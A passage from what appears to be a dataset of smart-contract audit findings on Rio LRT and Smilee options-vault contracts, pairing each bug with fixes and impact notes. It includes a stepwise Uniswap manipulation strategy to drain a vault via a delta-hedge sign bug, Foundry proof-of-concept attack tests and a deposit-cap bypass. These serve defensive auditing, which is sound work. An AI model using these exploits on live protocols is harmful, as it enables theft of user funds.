int256(shares));\\n return;\\n }\\n```\\n\\nThese users will pay for all slashing penalties instead of it being spread out among all LRT holders.чA potential solution to deal with this is to check if a deficit exists in `settleEpochFromEigenLayer()`. If it exists functionality has to be added that spreads the cost of the penalty fairly among all LRT holders.чIf a deficit is accumulated the first cohort to settle will pay for the entire amount. If they can not cover it fully, they will receive 0 and the following cohort will pay for the rest.ч```\\n uint256 balanceBefore = asset.getSelfBalance();\\n\\n address[] memory assets = asset.toArray();\\n bytes32[] memory roots = new bytes32[](queuedWithdrawalCount);\\n\\n IDelegationManager.Withdrawal memory queuedWithdrawal;\\n for (uint256 i; i < queuedWithdrawalCount; ++i) {\\n queuedWithdrawal = queuedWithdrawals[i];\\n\\n roots[i] = _computeWithdrawalRoot(queuedWithdrawal);\\n delegationManager.completeQueuedWithdrawal(queuedWithdrawal, assets, middlewareTimesIndexes[i], true);\\n\\n // Decrease the amount of ETH queued for withdrawal. We do not need to validate the staker as\\n // the aggregate root will be validated below.\\n if (asset == ETH_ADDRESS) {\\n IRioLRTOperatorDelegator(queuedWithdrawal.staker).decreaseETHQueuedForUserSettlement(\\n queuedWithdrawal.shares[0]\\n );\\n }\\n }\\n if (epochWithdrawals.aggregateRoot != keccak256(abi.encode(roots))) {\\n revert INVALID_AGGREGATE_WITHDRAWAL_ROOT();\\n }\\n epochWithdrawals.shareValueOfAssetsReceived = SafeCast.toUint120(epochWithdrawals.sharesOwed);\\n\\n uint256 assetsReceived = asset.getSelfBalance() - balanceBefore;\\n epochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n -ETH withdrawers do not earn yield while waiting for a withdrawalчmediumчIn the Rio doc we can read the following\\n\"Users will continue to earn yield as they wait for their withdrawal request to be processed.\"\\nThis is not true for withdrawals in ETH since they will simply receive an equivalent to the `sharesOWed` calculated when requesting a withdrawal.\\nWhen `requestWithdrawal()` is called to withdraw ETH `sharesOwed` is calculated\\n```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n\\nThe total `sharesOwed` in ETH is added to `epcohWithdrawals.assetsReceived` if we settle with `settleCurrentEpoch()` or `settleEpochFromEigenlayer()`\\nBelow are the places where `assetsReceived` is is set and accumulated\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived);\\n```\\n\\n```\\nepochWithdrawals.assetsReceived = SafeCast.toUint120(assetsReceived); \\n```\\n\\n```\\nepochWithdrawals.assetsReceived += SafeCast.toUint120(assetsReceived);\\n```\\n\\nwhen claiming rewards this is used to calculate users share\\n```\\namountOut = userSummary.sharesOwed.mulDiv(epochWithdrawals.assetsReceived, epochWithdrawals.sharesOwed);\\n```\\n\\nThe portion of staking rewards accumulated during withdrawal that belongs to LRT holders is never accounted for so withdrawing users do not earn any rewards when waiting for a withdrawal to be completed.чAccount for the accumulate rewards during the withdrawal period that belongs to the deposit pool. This can be calculated based on data in DelayedWithdrawalRouter on Eigenlayer.чSince a portion of the staking reward belongs to the LRT holders and since the docs mentions that yield is accumulated while in the queue It is fair to assume that withdrawing users have a proportional claim to the yield.\\nAs shown above this is not true, users withdrawing in ETH do no earn any rewards when withdrawing.\\nNot all depositors will be able to withdraw their assets/principal for non-ETH assets.\\nCzar102\\nI see. I will leave it a duplicate of #109, as it was, which will not change the reward distribution from the scenario where it was invalidated. cc @nevillehuang\\nThanks for reminding me to remove #177 from the duplicates @0xmonrel.\\nCzar102\\nResult: Medium Has Duplicates\\nConsidering this a Medium since the loss is constrained to the interest during some of the withdrawal time, which is a small part of the deposits.\\nsherlock-admin3\\nEscalations have been resolved successfully!\\nEscalation status:\\n0xmonrel: acceptedч```\\nsharesOwed = convertToSharesFromRestakingTokens(asset, amountIn);\\n```\\n -The sign of delta hedge amount can be reversed by malicious user due to incorrect condition in `FinanceIGDelta.deltaHedgeAmount`чhighчWhen delta hedge amount is calculated after the trade, the final check is to account for sqrt computation error and ensure the exchanged amount of side token doesn't exceed amount of side tokens the vault has. The issue is that this check is incorrect: it compares absolute value of the delta hedge amount, but always sets positive amount of side tokens if the condition is true. If the delta hedge amount is negative, this final check will reverse the sign of the delta hedge amount, messing up the hedged assets the protocol has.\\nAs a result, if the price moves significantly before the next delta hedge, protocol might not have enough funds to pay off users due to incorrect hedging. It also allows the user to manipulate underlying uniswap pool, then force the vault to delta hedge large amount at very bad price while trading tiny position of size 1 wei, without paying any fees. Repeating this process, the malicious user can drain/steal all funds from the vault in a very short time.\\nThe final check in calculating delta hedge amount in `FinanceIGDelta.deltaHedgeAmount` is:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe logic is that if due to small computation errors, delta hedge amount (to sell side token) can slightly exceed amount of side tokens the vault has, when in reality it means to just sell all side tokens the vault has, then delta hedge amount should equal to side tokens amount vault has.\\nThe issue here is that only positive delta hedge amount means vault has to sell side tokens, while negative amount means it has to buy side tokens. But the condition compares `abs(tokensToSwap)`, meaning that if the delta hedge amount is negative, but in absolute value very close to side tokens amount the vault has, then the condition will also be true, which will set `tokensToSwap` to a positive amount of side tokens, i.e. will reverse the delta hedge amount from `-sideTokens` to `+sideTokens`.\\nIt's very easy for malicious user to craft such situation. For example, if current price is significantly greater than strike price, and there are no other open trades, simply buy IG bull options for 50% of the vault amount. Then buy IG bull options for another 50%. The first trade will force the vault to buy ETH for delta hedge, while the second trade will force the vault to sell the same ETH amount instead of buying it. If there are open trades, it's also easy to calculate the correct proportions of the trades to make `delta hedge amount = -side tokens`.\\nOnce the vault incorrectly hedges after malicious user's trade, there are multiple bad scenarios which will harm the protocol. For example:\\nIf no trade happens for some time and the price increases, the protocol will have no side tokens to hedge, but the bull option buyers will still receive their payoff, leaving vault LPs in a loss, up to a situation when the vault will not have enough funds to even pay the option buyers payoff.\\nMalicious user can abuse the vault's incorrect hedge to directly profit from it. After the trade described above, any trade, even 1 wei trade, will make vault re-hedge with the correct hedge amount, which can be a significant amount. Malicious user can abuse it by manipulating the underlying uniswap pool: 2.1. Buy underlying uniswap pool up to the edge of allowed range (say, +1.8% of current price, average price of ETH bought = +0.9% of current price) 2.2. Provide uniswap liquidity in that narrow range (+1.8%..+2.4%) 2.3. Open/close any position in IG with amount = 1 wei (basically paying no fees) -> this forces the vault to delta hedge (buy) large amount of ETH at inflated price ~+2% of the current price. 2.5. Remove uniswap liquidity. 2.6. Sell back in the uniswap pool. 2.7. During the delta hedge, uniswap position will buy ETH (uniswap liquidity will sell ETH) at the average price of +2.1% of the current price, also receiving pool fees. The fees for manipulating the pool and \"closing\" position via providing liquidity will cancel out and overall profit will be: +2.1% - 0.9% = +1.2% of the delta hedge amount.\\nThe strategy can be enchanced to optimize the profitability, but the idea should be clear.чThe check should be done only when `tokensToSwap` is positive:\\n```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n- if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n+ if (tokensToSwap > 0 && SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\nчMalicious user can steal all vault funds, and/or the vault LPs will incur losses higher than uniswap LPs or vault will be unable to payoff the traders due to incorrect hedged amount.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testIncorrectDeltaHedge() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.09e18, 0.5e18, 0);\\n testBuyOption(1.09e18, 0.5e18, 0);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 1e18, 0);\\n vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n VaultUtils.logState(vault);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n }\\n\\n VaultUtils.logState(vault);\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*2, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n// rest of code\\n premium 0\\n baseToken balance 2090000000000000000\\n sideToken balance 0\\n// rest of code\\n premium 25585649987654406\\n baseToken balance 1570585649987654474\\n sideToken balance 499999999999999938\\n// rest of code\\n premium 25752512349788475\\n baseToken balance 2141338162337442881\\n sideToken balance 0\\n// rest of code\\n premium 0\\n baseToken balance 1051338162337442949\\n sideToken balance 999999999999999938\\n// rest of code\\n```\\n\\nNotice:\\nFirst trade (amount = 1 wei) settles delta-hedge at current price (1.09): sideToken = 0 because price is just above kB\\n2nd trade (buy ig bull amount = 0.5) causes delta-hedge of buying 0.5 side token\\n3rd trade (buy ig bull amount = 0.5) causes delta-hedge of selling 0.5 side token (instead of buying 0.5)\\nLast trade (amount = 1 wei) causes vault to buy 1 side token for correct delta-hedge (but at 0 fee to user).ч```\\n // due to sqrt computation error, sideTokens to sell may be very few more than available\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n -Position Manager providing the wrong strike when storing user's position dataчmediumчWhen users mint position using `PositionManager`, users can provide strike that want to be used for the trade. However, if the provided strike data is not exactly the same with IG's current strike, the minted position's will be permanently stuck inside the PositionManager's contract.\\nWhen `mint` is called inside `PositionManager`, it will calculate the premium, transfer the required base token, and eventually call `dvp.mint`, providing the user's provided information.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n\\n```\\n /// @inheritdoc IDVP\\n function mint(\\n address recipient,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown,\\n uint256 expectedPremium,\\n uint256 maxSlippage,\\n uint256 nftAccessTokenId\\n ) external override returns (uint256 premium_) {\\n strike;\\n _checkNFTAccess(nftAccessTokenId, recipient, amountUp + amountDown);\\n Amount memory amount_ = Amount({up: amountUp, down: amountDown});\\n\\n==> premium_ = _mint(recipient, financeParameters.currentStrike, amount_, expectedPremium, maxSlippage);\\n }\\n```\\n\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId++;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n==> strike: params.strike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp + params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium += premium;\\n position.notionalUp += params.notionalUp;\\n position.notionalDown += params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp + position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp + params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\n\\nPoC\\nAdd the following test to `PositionManagerTest` contract :\\n```\\n function testMintAndBurnFail() public {\\n (uint256 tokenId, ) = initAndMint();\\n bytes4 PositionNotFound = bytes4(keccak256(\"PositionNotFound()\"));\\n\\n vm.prank(alice);\\n vm.expectRevert(PositionNotFound);\\n pm.sell(\\n IPositionManager.SellParams({\\n tokenId: tokenId,\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n expectedMarketValue: 0,\\n maxSlippage: 0.1e18\\n })\\n );\\n }\\n```\\n\\nModify `initAndMint` function to the following :\\n```\\n function initAndMint() private returns (uint256 tokenId, IG ig) {\\n vm.startPrank(admin);\\n ig = new IG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vault.setAllowedDVP(address(ig));\\n\\n MarketOracle mo = MarketOracle(ap.marketOracle());\\n\\n mo.setDelay(ig.baseToken(), ig.sideToken(), ig.getEpoch().frequency, 0, true);\\n\\n Utils.skipDay(true, vm);\\n ig.rollEpoch();\\n vm.stopPrank();\\n\\n uint256 strike = ig.currentStrike();\\n\\n (uint256 expectedMarketValue, ) = ig.premium(0, 10 ether, 0);\\n TokenUtils.provideApprovedTokens(admin, baseToken, DEFAULT_SENDER, address(pm), expectedMarketValue, vm);\\n // NOTE: somehow, the sender is something else without this prank// rest of code\\n vm.prank(DEFAULT_SENDER);\\n (tokenId, ) = pm.mint(\\n IPositionManager.MintParams({\\n dvpAddr: address(ig),\\n notionalUp: 10 ether,\\n notionalDown: 0,\\n strike: strike + 1,\\n recipient: alice,\\n tokenId: 0,\\n expectedPremium: expectedMarketValue,\\n maxSlippage: 0.1e18,\\n nftAccessTokenId: 0\\n })\\n );\\n assertGe(1, tokenId);\\n assertGe(1, pm.totalSupply());\\n }\\n```\\n\\nRun the test :\\n```\\nforge test --match-contract PositionManagerTest --match-test testMintAndBurnFail -vvv\\n```\\nчWhen storing user position data inside PositionManager, query IG's current price and use it instead.\\n```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n // // rest of code\\n\\n if (params.tokenId == 0) {\\n // Mint token:\\n tokenId = _nextId// Add the line below\\n// Add the line below\\n;\\n _mint(params.recipient, tokenId);\\n\\n Epoch memory epoch = dvp.getEpoch();\\n// Add the line below\\n uint256 currentStrike = dvp.currentStrike();\\n\\n // Save position:\\n _positions[tokenId] = ManagedPosition({\\n dvpAddr: params.dvpAddr,\\n// Remove the line below\\n strike: params.strike,\\n// Add the line below\\n strike: currentStrike,\\n expiry: epoch.current,\\n premium: premium,\\n leverage: (params.notionalUp // Add the line below\\n params.notionalDown) / premium,\\n notionalUp: params.notionalUp,\\n notionalDown: params.notionalDown,\\n cumulatedPayoff: 0\\n });\\n } else {\\n ManagedPosition storage position = _positions[tokenId];\\n // Increase position:\\n position.premium // Add the line below\\n= premium;\\n position.notionalUp // Add the line below\\n= params.notionalUp;\\n position.notionalDown // Add the line below\\n= params.notionalDown;\\n /* NOTE:\\n When, within the same epoch, a user wants to buy, sell partially\\n and then buy again, the leverage computation can fail due to\\n decreased notional; in order to avoid this issue, we have to\\n also adjust (decrease) the premium in the burn flow.\\n */\\n position.leverage = (position.notionalUp // Add the line below\\n position.notionalDown) / position.premium;\\n }\\n\\n emit BuyDVP(tokenId, _positions[tokenId].expiry, params.notionalUp // Add the line below\\n params.notionalDown);\\n emit Buy(params.dvpAddr, _positions[tokenId].expiry, premium, params.recipient);\\n }\\n```\\nчIf the provided strike data does not match IG's current strike price, the user's minted position using `PositionManager` will be stuck and cannot be burned. This happens because when burn is called and `position.strike` is provided, it will revert as it cannot find the corresponding positions inside IG contract.\\nThis issue directly risking user's funds, consider a scenario where users mint a position near the end of the rolling epoch, providing the old epoch's current price. However, when the user's transaction is executed, the epoch is rolled and new epoch's current price is used, causing the mentioned issue to occur, and users' positions and funds will be stuck.ч```\\n function mint(\\n IPositionManager.MintParams calldata params\\n ) external override returns (uint256 tokenId, uint256 premium) {\\n IDVP dvp = IDVP(params.dvpAddr);\\n\\n if (params.tokenId != 0) {\\n tokenId = params.tokenId;\\n ManagedPosition storage position = _positions[tokenId];\\n\\n if (ownerOf(tokenId) != msg.sender) {\\n revert NotOwner();\\n }\\n // Check token compatibility:\\n if (position.dvpAddr != params.dvpAddr || position.strike != params.strike) {\\n revert InvalidTokenID();\\n }\\n Epoch memory epoch = dvp.getEpoch();\\n if (position.expiry != epoch.current) {\\n revert PositionExpired();\\n }\\n }\\n if ((params.notionalUp > 0 && params.notionalDown > 0) && (params.notionalUp != params.notionalDown)) {\\n // If amount is a smile, it must be balanced:\\n revert AsymmetricAmount();\\n }\\n\\n uint256 obtainedPremium;\\n uint256 fee;\\n (obtainedPremium, fee) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n\\n // Transfer premium:\\n // NOTE: The PositionManager is just a middleman between the user and the DVP\\n IERC20 baseToken = IERC20(dvp.baseToken());\\n baseToken.safeTransferFrom(msg.sender, address(this), obtainedPremium);\\n\\n // Premium already include fee\\n baseToken.safeApprove(params.dvpAddr, obtainedPremium);\\n\\n==> premium = dvp.mint(\\n address(this),\\n params.strike,\\n params.notionalUp,\\n params.notionalDown,\\n params.expectedPremium,\\n params.maxSlippage,\\n params.nftAccessTokenId\\n );\\n\\n // // rest of code.\\n }\\n```\\n -Whenever swapPrice > oraclePrice, minting via PositionManager will revert, due to not enough funds being obtained from user.чmediumчIn `PositionManager::mint()`, `obtainedPremium` is calculated in a different way to the actual premium needed, and this will lead to a revert, denying service to users.\\nIn `PositionManager::mint()`, the PM gets `obtainedPremium` from DVP::premium():\\n```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n\\nThen the actual premium used when minting by the DVP is obtained via the following code:\\n\\nFrom the code above, we can see that the actual premium uses the greater of the two price options. However, `DVP::premium()` only uses the oracle price to determine the `obtainedPremium`.\\nThis leads to the opportunity for `premiumSwap > premiumOrac`, so in the PositionManager, `obtainedPremium` is less than the actual premium required to mint the position in the DVP contract.\\nThus, when the DVP contract tries to collect the premium from the PositionManager, it will revert due to insufficient balance in the PositionManager:\\n```\\nIERC20Metadata(baseToken).safeTransferFrom(msg.sender, vault, premium_ + vaultFee);\\n```\\nчWhen calculating `obtainedPremium`, consider also using the premium from `swapPrice` if it is greater than the premium calculated from `oraclePrice`.чWhenever `swapPrice > oraclePrice`, minting positions via the PositionManager will revert. This is a denial of service to users and this disruption of core protocol functionality can last extended periods of time.ч```\\n(obtainedPremium, ) = dvp.premium(params.strike, params.notionalUp, params.notionalDown);\\n```\\n -Transferring ERC20 Vault tokens to another address and then withdrawing from the vault breaks `totalDeposit` accounting which is tied to deposit addressesчmediumчVault inherits from the ERC20, so it has transfer functions to transfer vault shares. However, `totalDeposit` accounting is tied to addresses of users who deposited with the assumption that the same user will withdraw those shares. This means that any vault tokens transfer and then withdrawal from either user breaks the accounting of `totalDeposit`, allowing to either bypass the vault's max deposit limitation, or limit the vault from new deposits, by making it revert for exceeding the vault deposit limit even if the amount deposited is very small.\\n`Vault` inherits from ERC20:\\n```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n\\nwhich has public `transfer` and `transferFrom` functions to `transfer` tokens to the other users, which any user can call:\\n```\\n function transfer(address to, uint256 amount) public virtual override returns (bool) {\\n address owner = _msgSender();\\n _transfer(owner, to, amount);\\n return true;\\n }\\n```\\n\\nIn order to limit the deposits to vault limit, vault has `maxDeposit` parameter set by admin. It is used to limit the deposits above this amount, reverting deposit transactions if exceeded:\\n```\\n // Avoids underflows when the maxDeposit is setted below than the totalDeposit\\n if (_state.liquidity.totalDeposit > maxDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n\\n if (amount > maxDeposit - _state.liquidity.totalDeposit) {\\n revert ExceedsMaxDeposit();\\n }\\n```\\n\\nIn order to correctly calculate the current vault deposits (_state.liquidity.totalDeposit), the vault uses the following:\\nVault tracks cumulative deposit for each user (depositReceipt.cumulativeAmount)\\nWhen user deposits, cumulative deposit and vault's `totalDeposit` increase by the amount of asset deposited\\nWhen user initiates withdrawal, both user's cumulative amount and `totalDeposit` are reduced by the percentage of cumulative amount, which is equal to perecentage of shares being withdrawn vs all shares user has.\\nThis process is necessary, because the share price changes between deposit and withdrawal, so it tracks only actual deposits, not amounts earned or lost due to vault's profit and loss.\\nAs can easily be seen, this withdrawal process assumes that users can't transfer their vault shares, because otherwise the withdrawal from the user who never deposited but got shares will not reduce `totalDeposit`, and user who transferred the shares away and then withdraws all remaining shares will reduce `totalDeposit` by a large amount, while the amount withdrawn is actually much smaller.\\nHowever, since `Vault` is a normal `ERC20` token, users can freely transfer vault shares to each other, breaking this assumption. This leads to 2 scenarios:\\nIt's easily possible to bypass vault deposit cap: 1.1. Alice deposits up to max deposit cap (say, 1M USDC) 1.2. Alice transfers all shares except 1 wei to Bob 1.3. Alice withdraws 1 wei share. This reduces `totalDeposit` by full Alice deposited amount (1M USDC), but only 1 wei share is withdrawn, basically 0 assets withdrawn. 1.4. Alice deposits 1M USDC again (now the total deposited into the vault is 2M, already breaking the cap of 1M).\\nIt's easily possible to lock the vault from further deposits even though the vault might have small amount (or even 0) assets deposited. 2.1. Alice deposits up to max deposit cap (say, 1M USDC) 2.2. Alice transfers all shares except 1 wei to Bob 2.3. Bob withdraws all shares. Since Bob didn't deposit previously, this doesn't reduce `totalDeposit` at all, but withdraws all 1M USDC to Bob. At this point `totalDeposit` = 1M USDC, but vault has 0 assets in it and no further deposits are accepted due to `maxDeposit` limit.чEither disallow transferring of vault shares or track vault assets instead of deposits. Alternatively, re-design the withdrawal system (for example, throw out cumulative deposit calculation and simply calculate total assets and total shares and when withdrawing - reduce `totalDeposit` by the sharesWithdrawn / totalShares * totalDeposit)чImportant security measure of vault max deposit limit can be bypassed, potentially losing funds for the users when the admin doesn't want to accept large amounts for various reasons (like testing something).\\nIt's possible to lock vault from deposits by inflating the `totalDeposit` without vault having actual assets, rendering the operations useless due to lack of liquidity and lack of ability to deposit. Even if `maxDeposit` is increased, `totalDeposit` can be inflated again, breaking protocol core functioning.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from 